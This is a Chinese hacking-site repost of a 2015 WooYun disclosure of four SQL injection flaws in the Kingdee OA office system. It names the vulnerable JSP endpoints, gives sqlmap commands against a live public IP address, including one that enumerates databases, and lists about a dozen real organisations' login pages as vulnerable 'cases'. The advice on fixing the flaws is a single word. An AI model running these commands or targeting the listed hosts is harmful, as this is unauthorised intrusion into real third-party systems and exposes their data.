记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

金蝶OA办公系统四个高危SQL注入漏洞

2015-10-28 15:10

存在漏洞的文件为:

code 区域
/kingdee/cash/tree/get_nodes.jsp?node=1

/kingdee/cash/tree/get_part.jsp?ids=1

/kingdee/cash/tree/get_selected.jsp?ids=1

/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1



0x1 sql注入1

code 区域
sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1"



1.png



0x2 sql注入2

code 区域
sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_part.jsp?ids=1" --dbms mssql



2.png



0x3 sql注入3

code 区域
sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_selected.jsp?ids=1"



3.png



0x4 sql注入4

code 区域
sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_netcom_lower_selected.jsp?ids=1"



4.png



漏洞案例:

code 区域
http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://122.139.60.103:800/kingdee/login/loginpage.jsp

http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp

http://222.179.238.182:8082/kingdee/login/loginpage2.jsp

http://222.134.77.23:8080/kingdee/login/loginpage.jsp

http://221.4.245.218:8080/kingdee/login/loginpage.jsp

http://221.226.149.17:8080/kingdee/login/loginpage.jsp

http://220.189.244.202:8080/kingdee/login/loginpage.jsp

http://222.133.44.10:8080/kingdee/login/loginpage.jsp

http://223.95.183.6:8080/kingdee/login/loginpage.jsp

http://61.190.20.51/kingdee/login/loginpage.jsp

http://60.194.110.187/kingdee/login/loginpage.jsp

http://oa.roen.cn/kingdee/login/loginpage.jsp

漏洞证明:

code 区域
sqlmap.py -u "http://221.226.149.17:8080/kingdee/cash/tree/get_nodes.jsp?node=1" --dbs



5.png

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0129822

阅读:149647 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“金蝶OA办公系统四个高危SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云